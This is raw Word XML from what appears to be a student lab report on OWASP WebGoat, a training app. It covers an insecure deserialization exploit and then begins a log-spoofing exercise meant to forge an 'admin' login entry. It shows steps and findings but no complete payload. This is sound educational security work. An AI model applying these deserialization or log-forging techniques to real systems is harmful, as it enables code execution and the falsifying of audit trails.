          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>).encodeToString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>(baos.toByteArray()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C4B4A4" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952F72E" w14:textId="7A363813" w:rsidR="00EC0C03" w:rsidRPr="00F3546C" w:rsidRDefault="00F3546C" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C03" w:rsidRPr="00F3546C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Ran the payload generation method in IntelliJ to obtain the crafted payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE1865D" w14:textId="0AAE301E" w:rsidR="00EC0C03" w:rsidRPr="00F3546C" w:rsidRDefault="00F3546C" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C03" w:rsidRPr="00F3546C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Resent the request with the crafted payload to trigger insecure deserialization in WebGoat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC71C8" w14:textId="4B671E1F" w:rsidR="00EC0C03" w:rsidRPr="00F3546C" w:rsidRDefault="00F3546C" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C03" w:rsidRPr="00F3546C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analyzed the system's response to identify potential security implications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002ED3C" w14:textId="77777777" w:rsidR="00F3546C" w:rsidRDefault="00F3546C" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFB1510" w14:textId="77777777" w:rsidR="00C24B78" w:rsidRDefault="00C24B78" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F53EBDB" w14:textId="77777777" w:rsidR="00C24B78" w:rsidRDefault="00C24B78" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4207F8CA" w14:textId="77777777" w:rsidR="00C24B78" w:rsidRDefault="00C24B78" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BB5606" w14:textId="118BFA24" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE021E9" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2081B98B" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00F3546C" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3546C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Vulnerabilities Discovered: Successfully exploited an insecure deserialization vulnerability in WebGoat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7D16E" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00F3546C" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3546C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Data or Access Gained: Demonstrated the ability to execute arbitrary code through manipulated serialized data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA2AD3" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00F3546C" w:rsidRDefault="00EC0C03" w:rsidP="00F3546C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3546C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes: Illustrates the risk of insecure deserialization, where untrusted data can lead to code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901AA16" w14:textId="77777777" w:rsidR="00F3546C" w:rsidRDefault="00F3546C" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4379AD87" w14:textId="781216CD" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E02FBD2" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438370B8" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise underscores the importance of securing deserialization processes in web applications. Insecure deserialization can allow attackers to manipulate data and execute arbitrary code, posing serious security risks. Proper input validation and secure coding practices are crucial to mitigate such vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24881CFC" w14:textId="77777777" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CCB6BB" w14:textId="23A2ED1C" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8AECD8" w14:textId="124A74FA" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48ACC3D4" w14:textId="5DD5643D" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implement strong input validation for serialized data to prevent manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1800C" w14:textId="27B9D838" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Adopt secure coding practices to validate and sanitize deserialized objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FA12A5" w14:textId="7606AC3D" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Regularly update and patch libraries and frameworks to address known insecure deserialization vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41753F50" w14:textId="3EAD30FD" w:rsidR="00BA107D" w:rsidRDefault="00BA107D" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAA05F5" w14:textId="676FCCF9" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B33C74" w14:textId="2A2F8C15" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B230DAD" w14:textId="0D29769A" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The exercise provided insights into the potential impact of insecure deserialization on web applications. In future assessments, a more thorough examination of serialization and deserialization processes will be essential to ensure robust security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD07007" w14:textId="257E68DF" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49668FA3" w14:textId="5E0E6F27" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA14AE9" w14:textId="3F5622F2" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC3BFAA" w14:textId="4A6511DB" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Browser Development Tools Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9C8957" w14:textId="51F0F84B" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4DAB5E" w14:textId="56AB22AF" w:rsidR="00EC0C03" w:rsidRPr="00EC0C03" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>OWASP Deserialization Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6E7F2" w14:textId="64D7AD4E" w:rsidR="00A510D6" w:rsidRDefault="00EC0C03" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0C03">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>IntelliJ IDEA Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF846E9" w14:textId="6D38AFC2" w:rsidR="00571D28" w:rsidRDefault="00C24B78" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="734236F9" wp14:editId="5F6348E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>29720</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6368726</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1950720" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1906782403" name="Picture 6" descr="A computer screen with a black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82403" name="Picture 6" descr="A computer screen with a black key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0720" cy="1463040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="653A2734" w14:textId="74BA63EB" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064E5545" w14:textId="412066B2" w:rsidR="00571D28" w:rsidRDefault="00C24B78" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C18F319" wp14:editId="22BB68EB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2201417</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6560800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1318895" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="45523156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31562"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8895" cy="845820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C22AB6" w14:textId="0D111F63" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515F4E82" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EA706F" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D15EE66" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6958E6C2" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F84D6C" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7672A19D" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217C3E58" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125BE2A6" w14:textId="77777777" w:rsidR="00571D28" w:rsidRDefault="00571D28" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7939A0" w14:textId="3B075E76" w:rsidR="00571D28" w:rsidRPr="006A6A5B" w:rsidRDefault="00571D28" w:rsidP="006A6A5B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>A9 Security Logging Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5886F0" w14:textId="0BE83D8A" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Logging Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EEECA8" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="00EC0C03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6357A8" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title and Objective: "Logging Security Assessment on WebGoat with Log Spoofing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20268D6B" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Objective: Evaluate the logging mechanisms in WebGoat to identify potential security vulnerabilities, focusing on log spoofing attacks. The goal is to manipulate log entries to make it appear as if the username "admin" successfully logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BFCFE" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F55BD1" w14:textId="5B739A5D" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology: Employed browser Development Tools and Network tab to intercept and analyze HTTP requests. Assessed </w:t>
      </w:r>
      <w:r w:rsidR="003209C4" w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Web Goat’s</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging features to identify security gaps and specifically tested for log spoofing vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD01599" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD99A05" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6A5B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6B35D" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="006A6A5B" w:rsidRDefault="006A6A5B" w:rsidP="006A6A5B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4BF93B" w14:textId="13E006C3" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Explored </w:t>
      </w:r>
      <w:r w:rsidR="003209C4" w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Web Goat’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging functionality to understand the logging mechanisms in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A555C6" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Leveraged browser Development Tools to intercept and inspect logging-related requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD88B2E" w14:textId="77777777" w:rsidR="006A6A5B" w:rsidRPr="00211DD7" w:rsidRDefault="006A6A5B" w:rsidP="00211DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00211DD7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
